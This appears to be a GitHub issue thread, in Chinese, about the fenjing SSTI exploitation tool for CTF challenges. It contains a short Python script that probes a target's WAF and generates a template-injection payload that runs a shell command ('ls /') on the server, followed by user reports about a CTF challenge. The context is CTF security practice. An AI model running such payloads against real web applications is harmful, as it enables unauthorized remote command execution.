Closed yuebusao closed 1 year ago
简单看了一下,用下面的方法可以自动检测这类题目的waf
from fenjing import exec_cmd_payload
import requests
url = "http://aaa:.combbb"
def waf(s):
r = requests.get(url, params = {
"name": "weshouldseethis" + s
})
return "weshouldseethis" in r.text
if __name__ == "__main__":
shell_payload, _ = exec_cmd_payload(waf, "ls /")
r = requests.get(url, params={
"name": shell_payload
})
print(r.text)
我等会加进焚靖里就行
OK, 使用pip install -U fenjing
应该就好了,如果有其他无法解出的情况欢迎提交
比如今年安洵杯的J4thon。
如果碰到黑名单会把碰到的黑名单字符回显出来,运行程序输出示例如下:
把waf加到example.py生成payload,输出信息:
使用payload报500,原因是两个\程序吧转义符也打印出来了,去掉转义符可以使用该payload。想问作者如何修改程序可以让我直接使用crack参数就可以打通呢?当然用example也可以,只不过感觉用crack一把梭比较爽2333。
感谢。